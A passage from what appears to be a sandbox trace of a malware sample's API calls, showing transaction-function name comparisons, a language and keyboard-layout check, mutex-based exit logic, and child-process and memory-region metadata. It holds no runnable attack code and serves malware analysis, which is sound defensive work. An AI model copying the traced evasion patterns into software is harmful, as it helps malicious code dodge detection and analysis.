(lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0109.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0109.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0109.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0109.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0109.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0109.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0109.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0109.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0109.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0109.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0109.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0109.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0109.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0109.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0109.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0109.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0109.315] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0109.315] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0109.315] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0109.315] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0109.315] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0109.315] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0109.315] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0109.315] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0109.316] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0109.316] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0109.316] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0109.316] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0109.316] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0109.316] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0109.316] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0109.316] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0109.316] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0109.316] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0109.316] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0109.316] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0109.316] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0109.316] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0109.316] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0109.316] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0109.316] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0109.316] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0109.316] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0109.316] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0109.316] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0109.316] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0109.316] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0109.316] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0109.316] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0109.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0109.317] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0109.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0109.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0109.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0109.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0109.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0109.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0109.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0109.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0109.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0109.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0109.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0109.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0109.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0109.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0109.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0109.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0109.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0109.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0109.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0109.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0109.318] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0109.510] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0109.510] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0109.510] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0109.510] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0109.510] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0109.510] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0109.510] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0109.510] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0109.510] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0109.510] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0109.510] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0109.510] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0109.510] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0109.510] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0109.510] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0109.510] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0109.510] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0109.510] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0109.510] GetProcessHeap () returned 0x430000 [0109.510] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d55030 | out: hHeap=0x430000) returned 1 [0109.521] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0109.521] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0109.521] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1000) returned 0x2d55030 [0109.523] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1a) returned 0x438640 [0109.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResumeServer", cchWideChar=-1, lpMultiByteStr=0x438640, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResumeServer", lpUsedDefaultChar=0x0) returned 13 [0109.523] GetLastError () returned 0x0 [0109.523] SetLastError (dwErrCode=0x0) [0109.523] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="ResumeServerW") returned 0x0 [0109.523] GetLastError () returned 0x7f [0109.523] SetLastError (dwErrCode=0x7f) [0109.523] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="ResumeServerA") returned 0x0 [0109.523] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="ResumeServer") returned 0x7ffc45e91280 [0109.523] GetActiveWindow () returned 0x0 [0109.529] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetSystemDefaultLangID") returned 0x7ffc5ecf8d90 [0109.529] GetSystemDefaultLangID () returned 0x409 [0109.530] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="GetKeyboardLayoutList") returned 0x7ffc5e9929a0 [0109.530] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0109.530] GetProcessHeap () returned 0x430000 [0109.530] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x8) returned 0x433cb0 [0109.530] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="GetKeyboardLayoutList") returned 0x7ffc5e9929a0 [0109.530] GetKeyboardLayoutList (in: nBuff=1, lpList=0x433cb0 | out: lpList=0x433cb0) returned 1 [0109.530] GetProcessHeap () returned 0x430000 [0109.530] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x433cb0 | out: hHeap=0x430000) returned 1 [0109.530] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateMutexA") returned 0x7ffc5ecfd6e0 [0109.530] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{a4f25aea-0e06-40f9-81b2-53370f3faa31}") returned 0x17c [0109.531] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetLastError") returned 0x7ffc5eceb710 [0109.531] GetLastError () returned 0x0 [0109.531] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0109.531] CloseHandle (hObject=0x17c) returned 1 [0109.531] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateMutexA") returned 0x7ffc5ecfd6e0 [0109.531] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{4b03c46d-9a60-4fba-bdeb-7fc0f42c98fa}") returned 0x17c [0109.531] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetLastError") returned 0x7ffc5eceb710 [0109.531] GetLastError () returned 0xb7 [0109.531] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0109.531] CloseHandle (hObject=0x17c) returned 1 [0109.531] ExitProcess (uExitCode=0x1) [0109.532] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43c300 | out: hHeap=0x430000) returned 1 [0109.532] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x445af0 | out: hHeap=0x430000) returned 1 [0109.533] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0109.533] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0109.533] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0109.533] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0109.534] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0109.534] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0109.534] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4470d0 | out: hHeap=0x430000) returned 1 [0109.534] RtlInterlockedFlushSList (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) returned 0x0 [0109.535] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0109.535] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 Thread: id = 20 os_tid = 0x11e4 Process: id = "6" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x24f90000" os_pid = "0x11a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=ResumeW" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 570 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 571 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 572 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 573 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 574 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 575 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 576 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 577 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 578 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 579 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 580 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 581 start_va = 0x400000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 582 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 583 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 584 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 585 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 586 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 587 start_va = 0x4f0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 588 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 589 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 590 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 591 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 592 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 593 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 594 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 595 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 596 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 597 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 598 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 599 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 600 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 601 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 602 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 603 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 604 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 605 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 606 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 607 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 608 start_va = 0x6f0000 end_va = 0x877fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 609 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 610 start_va = 0x880000 end_va = 0xa00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 611 start_va = 0xa10000 end_va = 0x1e0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 612 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 613 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 614 start_va = 0x1e10000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 615 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 616 start_va = 0x1e10000 end_va = 0x1ecffff monitored = 0 entry_point = 0x1e30da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 617 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 618 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = 